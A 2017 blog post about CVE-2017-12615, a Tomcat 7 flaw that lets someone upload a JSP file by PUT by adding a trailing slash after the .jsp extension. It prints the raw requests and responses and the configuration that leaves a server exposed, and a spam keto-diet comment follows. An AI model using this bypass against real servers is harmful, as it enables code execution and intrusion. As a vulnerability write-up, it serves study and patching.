Pages

Saturday, September 23, 2017

The Case of CVE-2017-12615 Tomcat 7 PUT vulnerability

Exploit proof of concept:

You guys came for the code. So, click on my github repo link:


Warning: Don't die ROFL-ing as it's hilariously simple to exploit :D

Crux of the issue:

By design, if you try to upload a JSP file via the HTTP PUT method on the Tomcat server, it won't work. You can upload .html, .jpg, or any other extensions except .jsp, .jspx and the variants. 
For example, if you try:

Request:
PUT /myfile.jsp HTTP/1.1Host: 127.0.0.1:8080Connection: closeContent-Length: 85
<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

You will get an error :( such as the one shown in the below response.
Response:
HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 971Date: Sat, 23 Sep 2017 06:07:27 GMTConnection: close
...SNIPPED.<html><head><title>Apache Tomcat/7.0.79 - Error report</title><style><!--H1

However, you can bypass the extension check by appending a '/' behind the .jsp extension:

Request:
PUT /myfile.jsp/ HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Response:
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:45:50 GMT
Connection: close

And I got the clue from the Apache site with the patch diff indicated here: 


Pre-requisite:

1. PUT method is enabled through conf/web.xml
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>

2. No authentication enforced in the security-constraint set at the app's WEB-INF/web.xml
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>


References:


Ok that's all for now. 

JS out.

1 comment:

  1. If you're looking to lose weight then you absolutely have to jump on this brand new custom keto plan.

    To design this keto diet, licenced nutritionists, personal trainers, and cooks joined together to develop keto meal plans that are productive, suitable, cost-efficient, and satisfying.

    Since their launch in early 2019, hundreds of individuals have already completely transformed their body and well-being with the benefits a certified keto plan can offer.

    Speaking of benefits: clicking this link, you'll discover 8 scientifically-tested ones provided by the keto plan.

    ReplyDelete